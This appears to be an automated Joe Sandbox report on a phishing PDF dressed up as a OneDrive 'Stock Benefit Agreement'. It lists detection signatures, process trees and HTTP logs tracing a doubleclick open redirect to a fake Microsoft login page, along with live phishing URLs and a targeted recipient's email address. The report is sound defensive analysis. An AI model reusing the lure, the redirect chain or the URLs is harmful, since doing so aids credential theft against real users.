Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Saint Charles Borromeo Seminary-Wprckny.pdf

Overview

General Information

Sample name:Saint Charles Borromeo Seminary-Wprckny.pdf
Analysis ID:1438531
MD5:5ff74700afdda8dca2777fd2b5145bf4
SHA1:24f89069556b235b0f115daa87641574ee3cb202
SHA256:f1d9aab353dc712b63e65a63a155ea3e2e03df38085b141c85275153bf31a513
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish10
Multimodal LLM detected phishing page
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
Suspicious PDF detected (based on various text indicators)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden URLs or javascript code
HTML title does not match URL
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Invalid T&C link found
JA3 SSL client fingerprint seen in connection with other malware
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • Acrobat.exe (PID: 6384 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Saint Charles Borromeo Seminary-Wprckny.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 3908 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 1364 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2160 --field-trial-handle=1628,i,15175157218959621648,12133064567235996358,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • chrome.exe (PID: 8116 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://ad.doubleclick.net/clk;265186560;90846275;t;pc=%5BTPAS_ID%5D?//telefornication.com/css/admin/file/hthehdkshjjsn/ojkcisnckbdshciudcbjdss/8929/mmclaughlin@scs.edu## MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 5152 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1940,i,3111557400391393984,2327874427274712486,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
3.5.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    3.4.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: Yara matchFile source: 3.5.pages.csv, type: HTML
      Source: Yara matchFile source: 3.4.pages.csv, type: HTML
      Source: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQLLM: Score: 9 brands: Microsoft Reasons: The URL 'https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ' is highly suspicious due to its complex and non-standard structure, which does not resemble Microsoft's legitimate domain. The image mimics a Microsoft login page, which is a common tactic in phishing to deceive users into entering their credentials. The domain name does not match any known Microsoft domain, further indicating a phishing attempt.
      Source: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQMatcher: Found strong image similarity, brand: MICROSOFT
      Source: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQMatcher: Template: microsoft matched
      Source: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQMatcher: Template: microsoft matched
      Source: Adobe Acrobat PDFOCR Text: OneDrive Shared Document Saint Charles Borromeo Seminary Stock Benefit Agreement.PDF 15KB Review Attachment Account Payable shared document with you via OneDrive This message (including any attachments) is confidential and may be privileged. If you are not the intended recipient please notify the sender by return e-mail and delete this message from your system. Any unauthorised use or dissemination of this message in whole or in part is strictly prohibited.
      Source: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQHTTP Parser: Number of links: 0
      Source: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQHTTP Parser: <input type="password" .../> found but no <form action="...
      Source: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/7FF88B1/#Hmmclaughlin@scs.eduHTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <meta http-equiv="X-UA-Compatible" c...
      Source: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQHTTP Parser: Title: HdUJRcHKLb does not match URL
      Source: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQHTTP Parser: Invalid link: Terms of use
      Source: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQHTTP Parser: Invalid link: Privacy & cookies
      Source: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQHTTP Parser: Invalid link: Terms of use
      Source: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQHTTP Parser: Invalid link: Privacy & cookies
      Source: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQHTTP Parser: <input type="password" .../> found
      Source: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/7FF88B1/#Hmmclaughlin@scs.eduHTTP Parser: No favicon
      Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/l704j/0x4AAAAAAAXFrE9g55weHUfb/auto/normalHTTP Parser: No favicon
      Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/l704j/0x4AAAAAAAXFrE9g55weHUfb/auto/normalHTTP Parser: No favicon
      Source: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQHTTP Parser: No favicon
      Source: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQHTTP Parser: No favicon
      Source: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQHTTP Parser: No <meta name="author".. found
      Source: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQHTTP Parser: No <meta name="author".. found
      Source: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQHTTP Parser: No <meta name="copyright".. found
      Source: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQHTTP Parser: No <meta name="copyright".. found
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
      Source: unknownHTTPS traffic detected: 104.125.88.106:443 -> 192.168.2.16:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.125.88.106:443 -> 192.168.2.16:49712 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49713 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.16:49752 version: TLS 1.2
      Source: Joe Sandbox ViewIP Address: 104.17.3.184 104.17.3.184
      Source: Joe Sandbox ViewIP Address: 151.101.66.137 151.101.66.137
      Source: Joe Sandbox ViewIP Address: 172.67.69.226 172.67.69.226
      Source: Joe Sandbox ViewIP Address: 104.26.9.44 104.26.9.44
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 104.125.88.106
      Source: unknownTCP traffic detected without corresponding DNS query: 104.125.88.106
      Source: unknownTCP traffic detected without corresponding DNS query: 104.125.88.106
      Source: unknownTCP traffic detected without corresponding DNS query: 104.125.88.106
      Source: unknownTCP traffic detected without corresponding DNS query: 104.125.88.106
      Source: unknownTCP traffic detected without corresponding DNS query: 104.125.88.106
      Source: unknownTCP traffic detected without corresponding DNS query: 104.125.88.106
      Source: unknownTCP traffic detected without corresponding DNS query: 104.125.88.106
      Source: unknownTCP traffic detected without corresponding DNS query: 104.125.88.106
      Source: unknownTCP traffic detected without corresponding DNS query: 104.125.88.106
      Source: unknownTCP traffic detected without corresponding DNS query: 104.125.88.106
      Source: unknownTCP traffic detected without corresponding DNS query: 104.125.88.106
      Source: unknownTCP traffic detected without corresponding DNS query: 104.125.88.106
      Source: unknownTCP traffic detected without corresponding DNS query: 104.125.88.106
      Source: unknownTCP traffic detected without corresponding DNS query: 104.125.88.106
      Source: unknownTCP traffic detected without corresponding DNS query: 104.125.88.106
      Source: unknownTCP traffic detected without corresponding DNS query: 104.125.88.106
      Source: unknownTCP traffic detected without corresponding DNS query: 104.125.88.106
      Source: unknownTCP traffic detected without corresponding DNS query: 104.125.88.106
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
      Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=tr4Mf1t3WFAGUHw&MD=GGGn5gAy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
      Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br
      Source: global trafficHTTP traffic detected: GET /clk;265186560;90846275;t;pc=%5BTPAS_ID%5D?//telefornication.com/css/admin/file/hthehdkshjjsn/ojkcisnckbdshciudcbjdss/8929/mmclaughlin@scs.edu HTTP/1.1Host: ad.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiRys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /css/admin/file/hthehdkshjjsn/ojkcisnckbdshciudcbjdss/8929/mmclaughlin@scs.edu HTTP/1.1Host: telefornication.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: telefornication.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://telefornication.com/css/admin/file/hthehdkshjjsn/ojkcisnckbdshciudcbjdss/8929/mmclaughlin@scs.eduAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /7FF88B1/ HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://telefornication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/ce7818f50e39/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/l704j/0x4AAAAAAAXFrE9g55weHUfb/auto/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=880b6b356a282766 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/l704j/0x4AAAAAAAXFrE9g55weHUfb/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/l704j/0x4AAAAAAAXFrE9g55weHUfb/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/7FF88B1/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ik0zZXU5YmFkS3YzdkxkSGY0RGcwM3c9PSIsInZhbHVlIjoiTDB2RzJ4UHRKWVdKKy9uOE9rRXBuOWZmbFhIaFIvNmRSYmpVbldlcEF4a3ZPOEg0YUFsQlVMQkd4NG1BOTNpZEsvcW5CRjBKQzlic0dTTEFtRVZZdmdrVk40QjUxYTBxRnhWVE84VnQ4eEVxOGJmY3VyZEI0MzdodnRROER4SFoiLCJtYWMiOiIzNDMyZTg1MmY0Y2Y2ZTk1NDk5NTJjYTBjMWJjOTJiYTc2YWNmYTE2ODI4OWVhOGIyNWMxZGM2ODgwMTU0NTIwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJXMWNmampPQU9BeDNWQjR6RzY4bmc9PSIsInZhbHVlIjoiVk5EN2QralJTbW9rVGNqMnpJdUNJSCtPaTA4Zm5LMUtVaTYwV0NXclAzL2xnVU10cERzU0ZHRk1maXp6MVl2cE5wNGp3bjFFa3lHeTZhZG5SdWs2V0lySzR5NkhmU3NMa29XMGs0WmVLUjZTbmRiYWY3NGNDZEN3NW41dElkTXYiLCJtYWMiOiIxZjg2MGMzN2ZhZDUxYTZlYWVlMWRiM2RjNTQxM2QxNGU3OWQ4NjVjNTdmMmUwMWM0Yjk5ZjdjMTZmNTE3NmQwIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/830379481:1715189460:4WJq2FlgaBnGPk-EL3xJ9pAJ6u5-Y1Cc3OADuoMfqYo/880b6b356a282766/84d6ba6304ae385 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
